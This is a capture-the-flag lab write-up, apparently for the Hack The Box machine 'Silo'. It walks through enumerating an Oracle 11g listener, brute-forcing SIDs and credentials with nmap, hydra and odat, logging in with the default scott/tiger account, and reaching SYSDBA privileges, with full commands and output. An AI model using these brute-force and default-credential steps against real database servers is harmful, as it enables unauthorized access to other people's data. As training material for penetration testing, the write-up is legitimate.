Oracle DB
Nmap discovered that the port 1521 is open
Port 1521 is mostly used by the Oracle Database listener, which listens for incoming connections to an Oracle database
The version is 11.2.0.2.0
it’s severely outdated
By default, Oracle TNS Listener <= 12.1 runs with the SYSTEM level privileges.
Exploiting this service will result in direct access to the SYSTEM
DB
When working with Oracle TNS listener (Oracle Database listener) on port 1521,1522, or 1529, enumerating DBs is the first step in the operation. Each DB has a unique SID, which can be brute-forced with many tools available
nmap
i can use nmap’s oracle-sid-brute script to brute-force the SID of DBs in the server
┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ nmap --script oracle-sid-brute -p 1521 $IP
starting nmap 7.93 ( https://nmap.org ) at 2022-10-17 21:17 CEST
stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
nse timing: About 0.00% done
Nmap scan report for 10.10.10.82
Host is up (0.030s latency).
PORT STATE SERVICE
1521/tcp open oracle
| oracle-sid-brute:
|_ XE
nmap done: 1 IP address (1 host up) scanned in 52.62 secondsNmap discovered a DB; XE
xe is a default db from installing oracle database express edition. Hence the name.
hydra
hydra also supports brute-forcing Oracle DB’s SIDs
┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ hydra -L wordlists/sids-oracle.txt oracle-sid://$IP:1521
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-17 17:09:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 737 login tries (l:737/p:1), ~47 tries per task
[DATA] attacking oracle-sid://10.10.10.82:1521/
[1521][oracle-sid] host: 10.10.10.82 login: CLRExtProc
[1521][oracle-sid] host: 10.10.10.82 login: PLSExtProc
[1521][oracle-sid] host: 10.10.10.82 login: XE
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-17 17:10:22hydra was able to enumerate 2 additional DBs;CLRExtProc and PLSExtProc
Important to note here is that CLRExtProc and PLSExtProc are technically NOT DBs
They are external procedures that are registered with the Oracle listener to run external code, such as C or C++ code, within the context of the Oracle Database
They may show up as valid SIDs when brute-forcing for possible SIDs against an Oracle DB server
Odat
odat can be used to brute-force SID of DBs as well.
┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ odat sidguesser -s $IP
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] searching valid sids thanks to a well known sid list on the 10.10.10.82:1521 server
[+] 'xe' is a valid sid. continue... ############################################################################### | eta: 00:00:00
100% |#################################################################################################################| time: 00:00:49
[1.2] searching valid sids thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#################################################################################################################| time: 00:00:01
[1.3] searching valid sids thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'xe' is a valid sid. continue... #################################################################### | eta: 00:00:04
100% |#################################################################################################################| time: 00:00:44
[+] sids found on the 10.10.10.82:1521 server: XEXE
Credentials
Once DBs are enumerated, the next step would be extracting credentials. This can also be done through brute-forcing via many tools available.
I will be using Odat to extract credentials as it is the most reliable method.
One key thing to remember is that the versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are VULNERABLE to offline brute force, which is also known as CVE-2012-3137
The target Oracle DB server is 11.2.0.2.0, which is vulnerable to the said offline brute force above.
It is also EXTREMELY important to note that Oracle Database server is actively locking down accounts after multiple failed login attempts much like that of Kerberos in AD
Odat
odat is capable of way more than just extracting SID or credentials.
It is a complete penetration testing platform designed for Oracle DB
┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ odat passwordguesser -s $IP -d XE
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
the login abm has already been tested at least once. what do you want to do: | ETA: --:--:--
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
C
[!] notice: 'ctxsys' account is locked, so skipping this username for password | ETA: 00:03:18
[!] notice: 'dip' account is locked, so skipping this username for password | ETA: 00:02:55
[!] notice: 'hr' account is locked, so skipping this username for password | ETA: 00:02:17
[!] notice: 'mdsys' account is locked, so skipping this username for password | ETA: 00:01:42
[!] notice: 'oracle_ocm' account is locked, so skipping this username for password | ETA: 00:01:18
[!] notice: 'outln' account is locked, so skipping this username for password# | ETA: 00:01:10
[+] valid credentials found: scott/tiger. Continue... #################### | ETA: 00:00:38
[!] notice: 'xdb' account is locked, so skipping this username for password####################################### | ETA: 00:00:07
100% |#################################################################################################################| time: 00:03:10
[+] accounts found on 10.10.10.82:1521/sid:XE:
scott/tigerIt showed a few locked accounts which were skipped for OPSEC
a valid credential is also found; scott:tiger
scott/tiger is a default credential in Oracle DB
Connecting to the server
Now that I have a valid DB and credential, I can connect to the DB and start enumerating further For step, I will be using a tool called, sqlplus
sqlplus
sqlplus is a most basic utility tool developed by Oracle that comes with every Oracle Database Server or Client installation. installation process appears to be very simple. I followed it through. there is also an article that had as a reference for Oracle SQL query
┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ sqlplus scott/tiger@$IP/XE
sql*plus: Release 19.0.0.0.0 - Production on Tue Jan 17 19:45:38 2023
Version 19.6.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
error:
ora-28002: the password will expire within 7 days
connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL>
Using sqlplus, I am now connected to the XE DB as thescott user
Listing Users
SQL> SELECT * FROM all_users;
USERNAME USER_ID CREATED
------------------------------ ----------
XS$NULL 2147483638 29-MAY-14
SCOTT 48 01-JAN-18
APEX_040000 47 29-MAY-14
APEX_PUBLIC_USER 45 29-MAY-14
FLOWS_FILES 44 29-MAY-14
HR 43 29-MAY-14
MDSYS 42 29-MAY-14
ANONYMOUS 35 29-MAY-14
XDB 34 29-MAY-14
CTXSYS 32 29-MAY-14
APPQOSSYS 30 29-MAY-14
USERNAME USER_ID CREATED
------------------------------ ----------
DBSNMP 29 29-MAY-14
ORACLE_OCM 21 29-MAY-14
DIP 14 29-MAY-14
OUTLN 9 29-MAY-14
SYSTEM 5 29-MAY-14
SYS 0 29-MAY-14
17 rows selected.
SELECT * FROM all_users;
I am able to list every user with the command above
I can see a few familiar users that I enumerated earlier.
Listing tables owned by current user
SQL> SELECT table_name FROM user_tables;
TABLE_NAME
------------------------------
DEPT
EMP
BONUS
SALGRADEThere are 4 tables owned by the scott user.
DEPT
SQL> SELECT * FROM DEPT;
DEPTNO DNAME LOC
---------- -------------- -------------
10 ACCOUNTING NEW YORK
20 RESEARCH DALLAS
30 SALES CHICAGO
40 OPERATIONS BOSTONEMP
SQL> SELECT * FROM EMP;
EMPNO ENAME JOB MGR HIREDATE SAL COMM
---------- ---------- --------- ---------- --------- ---------- ----------
DEPTNO
----------
7369 SMITH CLERK 7902 17-DEC-80 800
20
7499 ALLEN SALESMAN 7698 20-FEB-81 1600 300
30
7521 WARD SALESMAN 7698 22-FEB-81 1250 500
30
EMPNO ENAME JOB MGR HIREDATE SAL COMM
---------- ---------- --------- ---------- --------- ---------- ----------
DEPTNO
----------
7566 JONES MANAGER 7839 02-APR-81 2975
20
7654 MARTIN SALESMAN 7698 28-SEP-81 1250 1400
30
7698 BLAKE MANAGER 7839 01-MAY-81 2850
30
EMPNO ENAME JOB MGR HIREDATE SAL COMM
---------- ---------- --------- ---------- --------- ---------- ----------
DEPTNO
----------
7782 CLARK MANAGER 7839 09-JUN-81 2450
10
7788 SCOTT ANALYST 7566 19-APR-87 3000
20
7839 KING PRESIDENT 17-NOV-81 5000
10
EMPNO ENAME JOB MGR HIREDATE SAL COMM
---------- ---------- --------- ---------- --------- ---------- ----------
DEPTNO
----------
7844 TURNER SALESMAN 7698 08-SEP-81 1500 0
30
7876 ADAMS CLERK 7788 23-MAY-87 1100
20
7900 JAMES CLERK 7698 03-DEC-81 950
30
EMPNO ENAME JOB MGR HIREDATE SAL COMM
---------- ---------- --------- ---------- --------- ---------- ----------
DEPTNO
----------
7902 FORD ANALYST 7566 03-DEC-81 3000
20
7934 MILLER CLERK 7782 23-JAN-82 1300
10
14 rows selected.BONUS
SQL> SELECT * FROM BONUS;
no rows selectedBONUS table is empty
SALGRADE
SQL> SELECT * FROM SALGRADE;
GRADE LOSAL HISAL
---------- ---------- ----------
1 700 1200
2 1201 1400
3 1401 2000
4 2001 3000
5 3001 9999Listing tables accessible by current user
SQL> SELECT table_name,owner FROM all_tables;
TABLE_NAME OWNER
------------------------------ ------------------------------
DUAL SYS
SYSTEM_PRIVILEGE_MAP SYS
TABLE_PRIVILEGE_MAP SYS
STMT_AUDIT_OPTION_MAP SYS
AUDIT_ACTIONS SYS
WRR$_REPLAY_CALL_FILTER SYS
HS_BULKLOAD_VIEW_OBJ SYS
HS$_PARALLEL_METADATA SYS
HS_PARTITION_COL_NAME SYS
HS_PARTITION_COL_TYPE SYS
HELP SYSTEM
TABLE_NAME OWNER
------------------------------ ------------------------------
DR$OBJECT_ATTRIBUTE CTXSYS
DR$POLICY_TAB CTXSYS
DR$THS CTXSYS
DR$THS_PHRASE CTXSYS
DR$NUMBER_SEQUENCE CTXSYS
SRSNAMESPACE_TABLE MDSYS
OGIS_SPATIAL_REFERENCE_SYSTEMS MDSYS
OGIS_GEOMETRY_COLUMNS MDSYS
SDO_UNITS_OF_MEASURE MDSYS
SDO_PRIME_MERIDIANS MDSYS
SDO_ELLIPSOIDS MDSYS
TABLE_NAME OWNER
------------------------------ ------------------------------
SDO_DATUMS MDSYS
SDO_COORD_SYS MDSYS
SDO_COORD_AXIS_NAMES MDSYS
SDO_COORD_AXES MDSYS
SDO_COORD_REF_SYS MDSYS
SDO_COORD_OP_METHODS MDSYS
SDO_COORD_OPS MDSYS
SDO_PREFERRED_OPS_SYSTEM MDSYS
SDO_PREFERRED_OPS_USER MDSYS
SDO_COORD_OP_PATHS MDSYS
SDO_COORD_OP_PARAMS MDSYS
TABLE_NAME OWNER
------------------------------ ------------------------------
SDO_COORD_OP_PARAM_USE MDSYS
SDO_COORD_OP_PARAM_VALS MDSYS
SDO_CS_SRS MDSYS
NTV2_XML_DATA MDSYS
SDO_CRS_GEOGRAPHIC_PLUS_HEIGHT MDSYS
SDO_PROJECTIONS_OLD_SNAPSHOT MDSYS
SDO_ELLIPSOIDS_OLD_SNAPSHOT MDSYS
SDO_DATUMS_OLD_SNAPSHOT MDSYS
SDO_XML_SCHEMAS MDSYS
WWV_FLOW_DUAL100 APEX_040000
DEPT SCOTT
TABLE_NAME OWNER
------------------------------ ------------------------------
EMP SCOTT
BONUS SCOTT
SALGRADE SCOTT
WWV_FLOW_TEMP_TABLE APEX_040000
WWV_FLOW_LOV_TEMP APEX_040000
SDO_TOPO_DATA$ MDSYS
SDO_TOPO_RELATION_DATA MDSYS
SDO_TOPO_TRANSACT_DATA MDSYS
SDO_CS_CONTEXT_INFORMATION MDSYS
SDO_TXN_IDX_EXP_UPD_RGN MDSYS
SDO_TXN_IDX_DELETES MDSYS
TABLE_NAME OWNER
------------------------------ ------------------------------
SDO_TXN_IDX_INSERTS MDSYS
SDO_ST_TOLERANCE MDSYS
XDB$XIDX_IMP_T XDB
KU$_DATAPUMP_MASTER_10_1 SYS
KU$_DATAPUMP_MASTER_11_1 SYS
KU$_DATAPUMP_MASTER_11_1_0_7 SYS
KU$_DATAPUMP_MASTER_11_2 SYS
IMPDP_STATS SYS
ODCI_PMO_ROWIDS$ SYS
ODCI_WARNINGS$ SYS
ODCI_SECOBJ$ SYS
TABLE_NAME OWNER
------------------------------ ------------------------------
KU$_LIST_FILTER_TEMP_2 SYS
KU$_LIST_FILTER_TEMP SYS
KU$NOEXP_TAB SYS
OL$NODES SYSTEM
OL$HINTS SYSTEM
OL$ SYSTEM
PLAN_TABLE$ SYS
WRI$_ADV_ASA_RECO_DATA SYS
PSTUBTBL SYS
75 rows selected.Listing all tables
SQL> SELECT table_name, owner FROM dba_tables;
SELECT table_name, owner FROM dba_tables
*
error at line 1:
ora-00942: table or view does not existThe scott user is not able to view dba_tables
Viewing dba_tables requires higher privileges.
dba as in DB Admin
Listing session privileges
SQL> SELECT * FROM session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE TABLE
CREATE CLUSTER
CREATE SEQUENCE
CREATE PROCEDURE
CREATE TRIGGER
CREATE TYPE
CREATE OPERATOR
CREATE INDEXTYPE
9 rows selected.SELECT * FROM session_privs;
I can also list the current user’s session privileges
It would appear that the scott user has a lot of privileges
SQL> SELECT * FROM user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NOSELECT * FROM user_role_privs;
The current user’s role can be checked with the command above.
Based on the output, thescott user doesn’t seem that speicial
Checking if user environment is administrative
SQL> SELECT userenv('ISDBA') FROM dual;
USEREN
------
FALSEThe scott user is not in the administrative environment
Connecting to the server as SYSDBA
Users with the SYSDBA role is are fully empowered database administrators
┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ sqlplus scott/tiger@$IP/XE 'as SYSDBA'
sql*plus: Release 19.0.0.0.0 - Production on Tue Jan 17 20:27:54 2023
Version 19.6.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> The scott user is able to authenticate and login to the XE DB as SYSDBA
SQL> SELECT userenv('ISDBA') FROM dual;
USEREN
------
TRUENow the query returns TRUE as the session is authenticated with the SYSDBA role
This wasn’t the case earlier.
As mentioned in the beginning, Oracle TNS Listener <= 12.1 runs with the SYSTEM level privileges by default.
Accessing to the Oracle Database server with the SYSDBA role means that I now have the SYSTEM level privilege.